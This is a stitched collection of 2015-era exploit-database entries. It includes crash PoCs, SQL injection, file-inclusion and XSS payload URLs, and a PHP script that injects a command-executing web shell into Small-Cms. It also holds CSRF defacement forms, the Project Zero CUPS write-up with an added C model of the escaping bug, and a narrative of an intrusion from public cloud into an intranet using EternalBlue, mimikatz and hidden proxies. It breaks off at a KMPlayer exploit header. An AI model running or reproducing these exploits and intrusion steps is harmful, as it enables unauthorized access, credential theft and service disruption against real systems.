References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1522

Release Date:
=============
2015-06-16

Vulnerability Laboratory ID (VL-ID):
====================================
1522

Common Vulnerability Scoring System:
====================================
6

Product & Service Introduction:
===============================
ZTE zxv10 w300 ADSL wireless router cat family gateway (accessories include a host, a power line, a line of 1 root, separator, 1)

(Copy of the Vendor Homepage: http://wwwen.zte.com.cn/en/products/access/cpe/201302/t20130204_386351.html )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a remote vulnerability in the official ZTE Corporation ZXV10 W300 v3.1.0c_DR0 modem hardware.

Vulnerability Disclosure Timeline:
==================================
2015-06-16: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
ZTE Corporation
Product: ZTE ZXV10 W300 3.1.0c_DR0

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Technical Details & Description:
================================
A session vulnerability has been discovered in the official ZTE Corporation ZXV10 W300 v3.1.0c_DR0 modem hardware. The security vulnerability allows remote attackers to block/shutdown or delete network settings and components.

The LAN configuration is posted to /Forms/home_lan_1 and the page /home_lan_1 stores the configuration of the router. Attackers can request via the GET method the /Forms/home_lan_1 path and the modem will delete all the LAN configurations automatically. The problem is the GET method request with the /Forms/home_lan_1 path that deletes all the configurations. A hard reset is required after successful exploitation of the issue.

The security risk of the router ui web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.0. Exploitation of the security web vulnerability requires no privileged web-application user account and low user interaction (click link). Successful exploitation of the vulnerability results in reset of the modem device, shutdown of the network/lan or compromise of running services.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Forms/

Affected Module(s):
[+] home_lan_1

Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without a privileged application user account and low user interaction (click). For security demonstration or to reproduce follow the provided information and steps below to continue.

--- PoC Session Logs [GET] ---
13:18:35.526[0ms][total 0ms] Status: pending[] GET http://192.168.1.1/Forms/home_lan_1
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[192.168.1.1]
User-Agent[Mozilla/5.0 (X11; Linux i686; rv:38.0) Gecko/20100101 Firefox/38.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
X-Forwarded-For[8.8.8.8]
Connection[keep-alive]
Authorization[Basic YWRtaW46YWRtaW4=]

Note: The victim needs to click to perform only the GET method request with a non-expired session to execute!

Reference(s):
http://localhost/Forms/home_lan_1

Security Risk:
==============
The security risk of the remote vulnerability in the interface service is estimated as high. (CVSS 6.0)

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Hadji Samir [s-dz@hotmail.fr]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty.
-
WinylPlayer 3.0.3 - Memory Corruption (PoC)
#!/usr/bin/python
#[+] Author: Rajganesh (Raj) Pandurangan
#[+] Exploit Title: WinylPlayer 3.0.3 Memory Corruption PoC
#[+] Date: 06-17-2015
#[+] Category: DoS/PoC
#[+] Tested on: WinXp/Windows 7
#[+] Vendor: http://vinylsoft.com/
#[+] Download: http://vinylsoft.com/download/winyl_setup.zip
#[+] Sites: www.exclarus.com
#[+] Twitter: @rajganeshp
#[+] Thanks: offensive security (@offsectraining)

print("###########################################################")
print("# Title: WinylPlayer 3.0.3 Memory Corruption PoC #")
print("# Author: Rajganesh Pandurangan #")
print("# Category: DoS/PoC # ")
print("###########################################################")

# RIFF/WAVE header, followed by a long run of 0x41 bytes as the sample data.
header = (b"\x52\x49\x46\x46\x64\x31\x10\x00\x57\x41\x56\x45\x66\x6d\x74\x20"
          b"\x10\x00\x00\x00\x01\x00\x01\x00\x22\x56\x00\x00\x10\xb1\x02\x00"
          b"\x04\x00\x00\x00\x64\x61\x74\x61\x40\x31\x10\x00\x14\x00\x2a\x00"
          b"\x1a\x00\x30\x00\x26\x00\x39\x00\x35\x00\x3c\x00\x4a\x00\x3a\x00"
          b"\x5a\x00\x2f\x00\x67\x00\x0a")
exploit = header
exploit += b"\x41" * 900000

# Binary mode, so the header bytes are not altered by newline translation on Windows.
crash = open('crash.wav', 'wb')
crash.write(exploit)
crash.close()
-
Lively Cart - SQL Injection
##################################################################################################
#Exploit Title : Lively cart SQL Injection vulnerability
#Author : Manish Kishan Tanwar AKA error1046
#Vendor Link : http://codecanyon.net/item/livelycart-a-jquery-php-store-shop/5531393
#Date : 18/06/2015
#Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Incredible,Kishan Singh and ritu rathi
#Discovered At : Indishell Lab
##################################################################################################

////////////////////////
/// Overview:
////////////////////////
Lively cart is a shopping cart script, and the search parameter (search_query) is not filtering user-supplied data and hence is affected by an SQL injection vulnerability.

///////////////////////////////
// Vulnerability Description:
///////////////////////////////
The vulnerability is due to the search_query GET parameter.

////////////////
/// POC ////
///////////////
http://SERVER/1.2.0/product/search?search_query='

--==[[ Greetz To ]]==--
############################################################################################
#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
#Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA,
#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash
#############################################################################################

--==[[Love to]]==--
# My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,
#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty and Don(Deepika kaushik)

--==[[ Special Fuck goes to ]]==--
<3 suriya Cyber Tyson <3
-
Small-Cms - 'hostname' Remote PHP Code Injection
source: https://www.securityfocus.com/bid/53703/info

Small-Cms is prone to a remote PHP code-injection vulnerability. An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying computer; other attacks are also possible.

<?php
# Author : L3b-r1'z
# Title : Small Cms Php Code Injection
# Date : 5/25/2012
# Email : L3b-r1z@hotmail.com
# Site : Sec4Ever.Com & Exploit4Arab.Com
# Google Dork : allintext: "Copyright © 2012 . Small-Cms "
# -------- Put Target As site.com Just (site.com) -------- #

$target = $argv[1];
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, "http://$target/install.php?step=2&action=w");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, "hostname=LOL%22%3B%3F%3E%3C%3Fsystem(%24_GET%5B'cmd'%5D)%3B%3F%3E%3C%3F%22LOL&username=sssss&password=sssss&database=sssss");
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");
$buf = curl_exec($ch);
curl_close($ch);
unset($ch);
echo $buf;
# Curl By : RipS
?>
-
HansoPlayer 3.4.0 - Memory Corruption (PoC)
#!/usr/bin/python
#[+] Author: Rajganesh (Raj) Pandurangan
#[+] Exploit Title: HansoPlayer 3.4.0 Memory Corruption PoC
#[+] Date: 06-17-2015
#[+] Category: DoS/PoC
#[+] Tested on: WinXp/Windows 7
#[+] Vendor: http://www.hansotools.com
#[+] Download: http://www.hansotools.com/downloads/hanso-player-setup.exe
#[+] Sites: www.exclarus.com
#[+] Twitter: @rajganeshp
#[+] Thanks: offensive security (@offsectraining)

print("###########################################################")
print("# Title: HansoPlayer 3.4.0 Memory Corruption PoC #")
print("# Author: Rajganesh Pandurangan #")
print("# Category: DoS/PoC # ")
print("###########################################################")

# RIFF/WAVE header, followed by a long run of 0x41 bytes as the sample data.
header = (b"\x52\x49\x46\x46\x64\x31\x10\x00\x57\x41\x56\x45\x66\x6d\x74\x20"
          b"\x10\x00\x00\x00\x01\x00\x01\x00\x22\x56\x00\x00\x10\xb1\x02\x00"
          b"\x04\x00\x00\x00\x64\x61\x74\x61\x40\x31\x10\x00\x14\x00\x2a\x00"
          b"\x1a\x00\x30\x00\x26\x00\x39\x00\x35\x00\x3c\x00\x4a\x00\x3a\x00"
          b"\x5a\x00\x2f\x00\x67\x00\x0a")
exploit = header
exploit += b"\x41" * 900000

# Binary mode, so the header bytes are not altered by newline translation on Windows.
crash = open('crash.wav', 'wb')
crash.write(exploit)
crash.close()
-
Nilehoster Topics Viewer 2.3 - Multiple SQL Injections / Local File Inclusion
source: https://www.securityfocus.com/bid/53708/info

Nilehoster Topics Viewer is prone to multiple SQL-injection vulnerabilities and a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. By using directory-traversal strings to execute local script code in the context of the application, the attacker may be able to obtain sensitive information that may aid in further attacks. Topics Viewer 2.3 is vulnerable; other versions may also be affected.

http://www.example.com//search.php?q=[SQLi]
http://www.example.com//lost.php/ [SQLi]
http://www.example.com/footer.php? [LFI]
-
Yamamah Photo Gallery 1.1 - Database Information Disclosure
source: https://www.securityfocus.com/bid/53709/info

Yamamah Photo Gallery is prone to an information-disclosure vulnerability. An attacker can exploit this issue to download the database that contains sensitive information. Information harvested may aid in launching further attacks. Yamamah 1.1.0 is vulnerable; other versions may also be affected.

http://www.example.com/yamamah/cp/export.php
-
WHMCompleteSolution (WHMCS) 5.0 - Cross-Site Request Forgery (Multiple Application Function)
source: https://www.securityfocus.com/bid/53740/info

WHMCS is prone to a cross-site scripting vulnerability and multiple HTML-parameter-pollution vulnerabilities because it fails to properly sanitize user-supplied input. Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials, control how the page is rendered to the user, and override existing hard-coded HTTP parameters, which compromises the application. WHMCS 5.0 is vulnerable; other versions may also be affected.

http://www.example.com/cart.php?a=add&domain=transfer&n913620=v992636
http://www.example.com/domainchecker.php?search=bulkregister&n946774=v992350
http://www.example.com/cart.php?currency=2&gid=1&n972751=v976696
-
WHMCompleteSolution (WHMCS) - 'boleto_bb.php' SQL Injection
source: https://www.securityfocus.com/bid/53711/info

WHMCS (WHM Complete Solution) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

########################################
# First found around September 2011~
# Kept 0day because killing bugs is cruise control for gay.
# Author: dx7r
# fuck off.
# if you use this now, you're a moron. lots of love.
#######################################

import urllib2
import urllib
import os

def regglobcheck():
    # Reflects a marker value through the 'dadosboleto[identificacao]' parameter;
    # if it comes back in the page, register_globals is on and the parameter reaches the query.
    regglob1 = urllib2.Request('http://127.0.0.1/whmcs/whmcs_v451/whmcs/modules/gateways/boleto/boleto_bb.php?dadosboleto[identificacao]=test')
    regglob2 = urllib2.urlopen(regglob1)
    regglob3 = regglob2.read().count('test')
    if regglob3 == 0:
        rgen = 0
        print " [+] Register Globals not enabled, no sqli on this whmcs install"
    elif regglob3 >= 1:
        rgen = 1
        print " [+] Register Globals enabled, own it."

regglobcheck()
-
CUPS < 2.0.3 - Multiple Vulnerabilities
Source: http://googleprojectzero.blogspot.se/2015/06/owning-internet-printing-case-study-in.html

Abstract

Modern exploit mitigations draw attackers into a game of diminishing marginal returns. With each additional mitigation added, a subset of software bugs become unexploitable, and others become difficult to exploit, requiring application or even bug-specific knowledge that cannot be reused. The practical effect of exploit mitigations against any given bug or class of bugs is the subject of great debate amongst security researchers. Despite mitigations, skilled and determined attackers alike remain undeterred. They cope by finding more bugs, and by crafting increasingly complex exploit chains. Attackers treat these exploits as closely-guarded, increasingly valuable secrets, and it's rare to see publicly-available full-fledged exploit chains. This visibility problem contributes to an attacker's advantage in the short term, but hinders broader innovation.

In this blog post, I describe an exploit chain for several bugs I discovered in CUPS, an open-source printing suite. I start by analyzing a relatively-subtle bug in CUPS string handling (CVE-2015-1158), an exploit primitive. I discuss key design and implementation choices that contributed to this bug. I then discuss how to build an exploit using the primitive. Next, I describe a second implementation error (CVE-2015-1159) that compounds the effect of the first, exposing otherwise unreachable instances of CUPS. Finally, I discuss the specific features and configuration options of CUPS that either helped or hindered exploitation. By publishing this analysis, I hope to encourage transparent discourse on the state of exploits and mitigations, and inspire other researchers to do the same.

Summary

Cupsd uses reference-counted strings with global scope. When parsing a print job request, cupsd can be forced to over-decrement the reference count for a string from the request. As a result, an attacker can prematurely free an arbitrary string of global scope. I use this to dismantle ACLs protecting privileged operations, upload a replacement configuration file, then run arbitrary code.

The reference count over-decrement is exploitable in default configurations, and does not require any special permissions other than the basic ability to print. A cross-site scripting bug in the CUPS templating engine allows this bug to be exploited when a user browses the web. The XSS is reachable in the default configuration for Linux instances of CUPS, and allows an attacker to bypass default configuration settings that bind the CUPS scheduler to the 'localhost' or loopback interface.

Exploitation is near-deterministic, and does not require complex memory-corruption 'acrobatics'. Reliability is not affected by traditional exploit mitigations.

Background

Improper Teardown - Reference Count Over-Decrement (CVE-2015-1158)

When freeing localized multi-value attributes, the reference count on the language string is over-decremented when creating a print job whose 'job-originating-host-name' attribute has more than one value. In 'add_job()', cupsd incorrectly frees the 'language' field for all strings in a group, instead of using 'ipp_free_values()'.

scheduler/ipp.c:1626:

   /*
    * Free old strings...                                  ← Even 'old' strings need to be freed.
    */

    for (i = 0; i < attr->num_values; i ++)
    {
      _cupsStrFree(attr->values[i].string.text);
      attr->values[i].string.text = NULL;
      if (attr->values[i].string.language)                 ← for all values in an attribute
      {
        _cupsStrFree(attr->values[i].string.language);     ← free the 'language' string
        attr->values[i].string.language = NULL;
      }
    }

In this case, the 'language' field comes from the value of the 'attributes-natural-language' attribute in the request. To specifically target a string and free it, we send a 'IPP_CREATE_JOB' or 'IPP_PRINT_JOB' request with a multi-value 'job-originating-host-name' attribute. The number of 'job-originating-host-name' values controls how many times the reference count is decremented. For a 10-value attribute, the reference count for 'language' is increased once, but decremented 10 times.

The over-decrement prematurely frees the heap block for the target string. The actual block address will be quickly re-used by subsequent allocations. Dangling pointers to the block remain, but the content they point to changes when blocks are freed or reused. This is the basic exploit primitive upon which we build.

A Reflected XSS in the Web Interface (CVE-2015-1159)

The template engine is only vaguely context-aware, and only supports HTML. Template parsing and variable substitution and escaping are handled in 'cgi_copy()'. The template engine has 2 special cases for 'href' attributes from HTML links. The first case 'cgi_puturi()' is unused in current templates, but the second case ends up being interesting. The code is found in 'cgi_puts()', and escapes the following reserved HTML characters:

<>"'&

These are replaced with their HTML entity equivalents ('&lt;' etc...). The function contains a curious special case to deal with HTML links in variable values. Here is a code snippet, from cgi-bin/template.c:650:

    if (*s == '<')
    {
     /*
      * Pass <A HREF="url"> and </A>, otherwise quote it...
      */

      if (!_cups_strncasecmp(s, "<A HREF=\"", 9))
      {
        fputs("<A HREF=\"", out);
        s += 9;

        while (*s && *s != '\"')
        {
          if (*s == '&')
            fputs("&amp;", out);
          else
            putc(*s, out);

          s ++;
        }

        if (*s)
          s ++;

        fputs("\">", out);
      }

For variable values containing '<a href="', all subsequent characters before a closing double-quote are subject to less restrictive escaping, where only the '&' character is escaped. The characters <>', and a closing " would normally be escaped, but are echoed unaltered in this context. Note that the data being escaped here is client-supplied input, the variable value from the CGI argument. This code may have been intended to deal with links passed as CGI arguments. However, the template engine's limited context-awareness becomes an issue. Take this example from templates/help-header.tmp:19:

<P CLASS="l0"><A HREF="/help/{QUERY??QUERY={QUERY}:}">All Documents</A></P>

In this case, the CGI argument 'QUERY' is already contained inside a 'href' attribute of a link. If 'QUERY' starts with '<a href="', the double-quote will close the 'href' attribute opened in the static portion of the template. The remainder of the 'QUERY' variable will be interpreted as HTML tags. Requesting the following URI will demonstrate this reflected XSS:

http://localhost:631/help/?QUERY=%3Ca%20href=%22%20%3E%3Cscript%3Ealert%28%27Linux%20crickets%20chirping%20for%20a%20patch%27%29%3C/script%3E%3C!--&SEARCH=Search

The 'QUERY' parameter is included in the page twice, leading to multiple unbalanced double-quotes. As such, the open comment string '<!--' is used to yield a HTML page that parses without errors.

Upstream Fixes

Apple Fix (April 16, 2015):
https://support.apple.com/kb/DL1807

Official CUPS fix for downstream vendors (June 8, 2015):
https://www.cups.org/str.php?L4609
http://www.cups.org/blog.php?L1082+I0+Q

Project Zero Bug

For those interested, the sample exploit can be found here:
https://code.google.com/p/google-security-research/issues/detail?id=455
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37336.tar.gz

Disclosure Timeline

March 20th, 2015 - Initial notification to Apple
April 16th, 2015 - Apple ships fix in Mac OS X 10.10.3
June 8th, 2015 - CUPS ships official fix in CUPS 2.0.3
June 18th, 2015 - Disclosure + 90 days
June 19th, 2015 - P0 publication

Attack Surface Reduction in CUPS 2.0.3+

CUPS 2.0.3 and 2.1 beta contain several prescient implementation changes to limit the risk and impact of future similar bugs:

- Configuration value strings are now logically separated from the string pool, allocated by strdup() instead.
- LD_* and DYLD_* environment variables are blocked when CUPS is running as root.
- The localhost listener is removed when 'WebInterface' is disabled (2.1 beta only).

Acknowledgements

Thanks to Ben Hawkes, Stephan Somogyi, and Mike Sweet for their comments and edits.

Conclusion

No one prints anything anymore anyways.
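The 'cgi_puts()' special case discussed above, modelled in C as an added example (this is not CUPS code) beside a hardened escaper that treats every value the same way; the entity names, the buffer handling and render_help_link are this example's own, and _cups_strncasecmp is stood in for by a small case-insensitive prefix check.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
/* Model of the cgi_puts() escaping path the post describes, written for this page;
 * not CUPS code. Entity names and buffer handling are this example's own choices.
 * Writers return 0 on success and -1 when the output buffer would overflow. */
static int emit(char *out, size_t outlen, size_t *pos, const char *src)
{
    size_t n = strlen(src);
    if (*pos + n + 1 > outlen)
        return -1;                     /* fail closed rather than truncate */
    memcpy(out + *pos, src, n);
    *pos += n;
    out[*pos] = '\0';
    return 0;
}

static int emit_char(char *out, size_t outlen, size_t *pos, char c)
{
    char one[2] = { c, '\0' };
    return emit(out, outlen, pos, one);
}

/* Entity-escape the five reserved characters <>"'& and pass anything else through. */
static int emit_escaped(char *out, size_t outlen, size_t *pos, char c)
{
    switch (c) {
    case '<':  return emit(out, outlen, pos, "&lt;");
    case '>':  return emit(out, outlen, pos, "&gt;");
    case '"':  return emit(out, outlen, pos, "&quot;");
    case '\'': return emit(out, outlen, pos, "&#39;");
    case '&':  return emit(out, outlen, pos, "&amp;");
    default:   return emit_char(out, outlen, pos, c);
    }
}

/* Case-insensitive check for the <A HREF=" prefix (stands in for _cups_strncasecmp). */
static int has_link_prefix(const char *s)
{
    const char *p = "<a href=\"";
    for (; *p; p++, s++)
        if (tolower((unsigned char)*s) != (unsigned char)*p)
            return 0;
    return 1;
}

/* Vulnerable variant: a value starting with <A HREF=" is copied through to the next
 * double quote with only '&' escaped, so <, > and quotes in that region stay raw. */
int escape_vuln(const char *s, char *out, size_t outlen)
{
    size_t pos = 0;
    out[0] = '\0';
    while (*s) {
        if (*s == '<' && has_link_prefix(s)) {
            if (emit(out, outlen, &pos, "<A HREF=\"") < 0)
                return -1;
            s += 9;
            while (*s && *s != '"') {
                int rc = (*s == '&') ? emit(out, outlen, &pos, "&amp;")
                                     : emit_char(out, outlen, &pos, *s);
                if (rc < 0)
                    return -1;
                s++;
            }
            if (*s)
                s++;                   /* skip the closing quote */
            if (emit(out, outlen, &pos, "\">") < 0)
                return -1;
            continue;
        }
        if (emit_escaped(out, outlen, &pos, *s) < 0)
            return -1;
        s++;
    }
    return (int)pos;                   /* output length, or -1 above on overflow */
}

/* Hardened variant: no link special case; every reserved character is escaped. */
int escape_fixed(const char *s, char *out, size_t outlen)
{
    size_t pos = 0;
    out[0] = '\0';
    for (; *s; s++)
        if (emit_escaped(out, outlen, &pos, *s) < 0)
            return -1;
    return (int)pos;
}

/* Render the help-header link quoted above with QUERY substituted; with the
 * vulnerable escaper the value's own quote closes the static href attribute. */
int render_help_link(const char *query, int hardened, char *out, size_t outlen)
{
    char esc[512];
    int rc = hardened ? escape_fixed(query, esc, sizeof esc)
                      : escape_vuln(query, esc, sizeof esc);
    if (rc < 0)
        return -1;
    return snprintf(out, outlen, "<A HREF=\"/help/?QUERY=%s\">All Documents</A>", esc);
}
```

With a constructed value such as `<a href=" ><i>injected</i>` the vulnerable path emits the `<i>` tag raw and the quote terminates the template's own href, while the hardened path yields only entities.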
-
WHMCompleteSolution (WHMCS) 5.0 - 'KnowledgeBase.php?search' Cross-Site Scripting
source: https://www.securityfocus.com/bid/53740/info

WHMCS is prone to a cross-site scripting vulnerability and multiple HTML-parameter-pollution vulnerabilities because it fails to properly sanitize user-supplied input. Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials, control how the page is rendered to the user, and override existing hard-coded HTTP parameters, which compromises the application. WHMCS 5.0 is vulnerable; other versions may also be affected.

http://www.example.com/knowledgebase.php?action = [XSS]
-
VoipNow Professional 2.5.3 - 'nsextt' Cross-Site Scripting
source: https://www.securityfocus.com/bid/53759/info

VoipNow Professional is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. VoipNow Professional 2.5.3 is vulnerable; other versions may also be vulnerable.

http://www.example.com/index.php?nsextt=[xss]
-
TinyCMS 1.3 - Arbitrary File Upload / Cross-Site Request Forgery
source: https://www.securityfocus.com/bid/53761/info

TinyCMS is prone to multiple local file-include vulnerabilities and an arbitrary-file-upload vulnerability. An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information. TinyCMS 1.3 is vulnerable; other versions may also be affected.

<form action='http://www.example.com/inc/functions.php?view=admin&do=pages&create=new&save=1' method='post'>
<strong>Page Title :</strong> <input type="text" name="title" size="50" value='Happy Milw0rm 1337day !'>
<textarea id="elm1" name="page">
<center>
<h1> HaCked By KedAns-Dz </h1>
<h2> Happy Milw0rm 1337-Day All Hax0rS ^.^ </h2>
<h3> Greetings t0 KeyStr0ke + JF and All 0ld School ( The Milw0rm ) </h3>
</center>
</textarea>
<input type='submit' value='Upload Page'>
</form>
-
TinyCMS 1.3 - '/admin/admin.php?do' Traversal Local File Inclusion
source: https://www.securityfocus.com/bid/53761/info

TinyCMS is prone to multiple local file-include vulnerabilities and an arbitrary-file-upload vulnerability. An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information. TinyCMS 1.3 is vulnerable; other versions may also be affected.

<form action='http://www.example.com/admin/admin.php?view=admin&do=../../../../[ LFI ]%00' method='post'>
<input type='submit' value='Get/Include Local File'>
</form>
-
TinyCMS 1.3 - 'index.php?page' Traversal Local File Inclusion
source: https://www.securityfocus.com/bid/53761/info

TinyCMS is prone to multiple local file-include vulnerabilities and an arbitrary-file-upload vulnerability. An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information. TinyCMS 1.3 is vulnerable; other versions may also be affected.

<form action='http://www.example.com/index.php?page=../../../../../[ LFI ]%00' method='post'>
<input type='submit' value='Get/Include Local File'>
</form>
-
Title: From public-cloud penetration to intranet roaming
0x01 Introduction

When an enterprise hosts its business on a public cloud such as Tencent Cloud or Alibaba Cloud, those hosts are not connected to the enterprise intranet; this amounts to logical (not physical) isolation. If the enterprise's information security is relatively good and it does not expose VPN addresses, routers or firewall services, it is hard to pinpoint the public network address used by the enterprise intranet while gathering information, and getting into the intranet is relatively difficult at that point. This article presents an actual penetration process that goes from a public cloud into the intranet for roaming.

0x02 Early stage

How the cloud server was obtained is not the focus of this article, so rather than describe it in detail I will only outline the idea. Starting from the company name, a direct Baidu search turned up the official website address. Based on the official website address, a round of information gathering was carried out. The site turned out to use a CDN, with the host on Tencent Cloud; the IP changed and the real IP could not be detected. A command-execution vulnerability was found. RCE directly and obtain server privileges. First look at the IP address: it showed an intranet address. At this point, check the real IP, but this is not useful for the subsequent intranet penetration. It only showed that it was Tencent Cloud and that the host was not on the intranet.

0x03 Finding a way into the intranet

At this point the external network IP of the company's office network is needed; this external IP is either a firewall or a router. How to get it? I came up with a solution. In general, cloud hosts are managed by operations and maintenance staff over SSH. Generally they connect during working hours, and at that moment the company's real public network IP can be obtained. A little trick: if it is a small company, operations may not connect for ten days or half a month. At that point you can do "a little damage" to force operations online, for example by shutting down the web service. Pay attention to two points: do not act too much, so that operations does not realise they have been hacked; of course permissions can be maintained in advance, which I will not introduce here. Without "authorization", do not mess around. Without authorization, do not mess around. Without authorization, do not mess around. Otherwise you will go to the bureau for a free meal. Why can't we do illegal things? Haha. Let's see whether operations is online:

[root@vm-0-13-centos ~]# netstat -lantp | grep ESTABLISHED

Focus on the sshd process. The public network IP in front of it is the public IP of the company where operations is located. I found two of them here.

0x04 Penetrating the IPs above

Take another round of the same boring stuff and gather information. A Shiro deserialization vulnerability was found, and a shell was bounced back directly. Went straight in; look at the intranet address: the intranet address is 10.10.10.187.

0x05 Happy intranet roaming

An FRP + Proxifier agent is set up. I won't describe how to build it here in detail; you can Google it yourself, it is very simple. Make it a Socks5 proxy; it is best to encrypt it to avoid AV traffic detection, and also best to add a password to the proxy so that "others" cannot use it. I used a modified version of FRP here, loading the configuration file remotely, which evades a little and slightly increases the difficulty of tracing. The agent is built. Next, scan the intranet and check: there is the classic MS17-010 vulnerability; in fact many other vulnerabilities were found. Let's quickly start with the best, MS17-010. This is a Windows Server and has excellent exploitation value. After using it, the server is used as another layer of agent. Even RDP can be used to finish the fight and shuttle quickly. My MSF is on the public network; using proxychains, I proxy and attack directly. Launch the attack: run it a few more times. The attack succeeded (this picture was added later and the information may be inconsistent, but the principle is the same). Let's confirm the privileges are the highest system privileges, so that privilege escalation can be ruled out. Grab passwords with mimikatz: obtain the administrator's password, find that 3389 is open, and log in remotely via the proxy; local authentication can be used. A Qunhui NAS was also found, and 3 vCenters with a great many virtual machines. I took a quick look; there were hundreds. All of them can be taken over.

0x06 Summary

1. Search the target company's name, look up the company's official website address and gather information. The IP corresponding to the sent message includes a CDN service, and the company's real address cannot be obtained. A subdomain of the company has a remote command execution vulnerability, so server privileges are obtained.
2. Connect remotely through Ice Scorpion and run commands to query the IP address (ifconfig). The IP addresses are all intranet addresses plus a public network address; query the public address, and it is still a Tencent Cloud IP.
3. The target company's egress public network address must be obtained. Here the target site can be made to suffer web service downtime or anomalies (such as closing the service or causing abnormal web traffic) so that operations staff log in to the bastion host, then log in to the Tencent Cloud host to check the web service.
4. At this point check the network connections and confirm the target company's egress public network address: netstat -lantp | grep ESTABLISHED
5. Through information collection, you will find that the target company's public IP has a certain port open, and there is a Shiro deserialization vulnerability.
6. Run the command to view the IP address, and find that the target is the intranet address 10.10.10.187; test whether it is connected to the external network: ping www.baidu.com
10. A Socks5 proxy is run via FRP + Proxifier or proxychains. A password and simple encryption should be set for FRP here.
12. Load fscan through Proxifier to scan the target intranet and find that 10.10.10.105 has MS17-010.
13. Load MSF through proxychains, run and attack with the MS17-010 module, and obtain hashes with mimikatz:
    msf > use exploit/windows/smb/ms17_010_eternalblue
    msf > set RHOSTS 10.10.10.105
    msf > run
    meterpreter > getuid
    (mimikatz) meterpreter > creds_wdigest   // obtain hash values
14. The administrator's password is obtained and 3389 is found to be open. Go straight through the Proxifier Socks5 proxy and log in to the remote desktop.
15. After entering the system, a virtual machine is found. Local authentication is used on the virtual machine. After logging in to the virtual machine, it turns out to be a Qunhui NAS.
16. The Qunhui NAS has VMware vSphere, with three vCenters.

Original link: https://mp.weixin.qqc.com/s?__biz=mzg4ntuwmzm1ng==mid=22474929554Idx=1Sn=412BBB64E880E6F6F63BA3AE05B2129EB0CHKSM=CFA5414 9F8D2C85F3145E011EDF2EC5B05B2D0614B0408D48D48EA8DAA03087037228502C1686SCENE=178CUR_ALBUM_ID=1553386251775492092098#RD
-
Seagate Dashboard 4.0.21.0 - Crash (PoC)
#!/usr/bin/env python
# Exploit Title: Crash PoC Seagate Dashboard 4.0.21.0
# Date: 2015-06-20
# Exploit Author: HexTitan
# Vendor Homepage: http://www.seagate.com/
# Software Link: http://www.seagate.com/support/downloads/item/seagate-dashboard-windows-master-dl/
# Version: 4.0.21.0
# Tested on: Windows 8.1 32bit
#
#Description:
#
#The dashboard tool is part of the Seagate software solution for storage. The Dashboard.exe process opens a random port in the 5000-6000 range on each launch.
#
#PoC:
#
#The attached Python script will send 3100 A's to the target port. This will cause a crash in the Dashboard.exe process.
#
#
#Solution:
#
#Until a fix is available, firewall the Dashboard.exe process.

import socket
import sys
import os

target = '[ip]'
port = [port]
buffer = 'A' * 3100

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    connect = s.connect((target, port))
    print '[*] Connected to ' + target
except:
    print '[-] Unable to connect to ' + target
    sys.exit(0)

s.send(buffer)
print '[!] Malformed request sent\n'
s.close()
-
KMPlayer 3.9.1.136 - Capture Unicode Buffer Overflow (ASLR Bypass)
#!/usr/bin/python
#
# KMPlayer 3.9.1.136 Capture Unicode Buffer Overflow (ASLR Bypass)
#
# Author: Naser Farhadi
#
# Date: 21 June 2015
# Version: 3.9.1.136
# Tested on: Windows 7 SP1 (32 bit)
#
# Usage:
